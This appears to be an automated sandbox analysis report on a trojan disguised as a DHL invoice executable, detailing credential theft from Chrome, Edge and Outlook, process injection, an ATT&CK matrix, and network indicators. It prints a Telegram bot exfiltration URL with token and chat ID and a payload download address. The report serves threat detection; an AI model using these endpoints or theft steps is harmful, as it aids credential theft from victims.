              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeQueries volume information: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              211
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Scheduled Task/Job
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              211
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares1
              Data from Local System
              1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information
              LSA Secrets1
              System Network Configuration Discovery
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Invoice DHL - AWB 2024 E4001 - 0000731.exe26%VirustotalBrowse
              Invoice DHL - AWB 2024 E4001 - 0000731.exe26%ReversingLabs
              Invoice DHL - AWB 2024 E4001 - 0000731.exe100%AviraHEUR/AGEN.1308518
              Invoice DHL - AWB 2024 E4001 - 0000731.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              104.21.67.152
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.247.73
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                            high
                            http://160.22.121.182/STATO/Vskhdvzxu.mp3false
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netiInvoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/14436606/23354Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgInstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/mgravell/protobuf-netJInvoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botInstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/11564914/23354;Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/2152978/23354Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org/qInvoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                                                high
                                                https://reallyfreegeoip.org/xml/8.46.123.189$InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/mgravell/protobuf-netInvoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.orgInstallUtil.exe, 00000004.00000002.2940130567.0000000002594000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000250D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://160.22.121.182Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://checkip.dyndns.comInstallUtil.exe, 00000004.00000002.2940130567.0000000002587000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000025B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002579000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.000000000256B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://api.telegram.orgInstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://160.22.121.182/STATO/Vskhdvzxu.mp310zmhb41piE2K/FJ1XdBqJA==Invoice DHL - AWB 2024 E4001 - 0000731.exefalse
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInvoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002381000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      104.21.67.152
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      160.22.121.182
                                                                      unknownunknown
                                                                      45194SIPL-ASSysconInfowayPvtLtdINfalse
                                                                      132.226.247.73
                                                                      checkip.dyndns.comUnited States
                                                                      16989UTMEMUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1578744
                                                                      Start date and time:2024-12-20 10:21:07 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 23s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:6
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Invoice DHL - AWB 2024 E4001 - 0000731.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/0@3/4
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 93%
                                                                      • Number of executed functions: 313
                                                                      • Number of non-executed functions: 27
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      04:22:00API Interceptor16x Sleep call for process: Invoice DHL - AWB 2024 E4001 - 0000731.exe modified
                                                                      04:22:40API Interceptor502889x Sleep call for process: InstallUtil.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.220c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                        9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                          9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                        D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          104.21.67.152PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              132.226.247.73PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.comRequested Documentation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              reallyfreegeoip.orgYU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              api.telegram.orgc9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
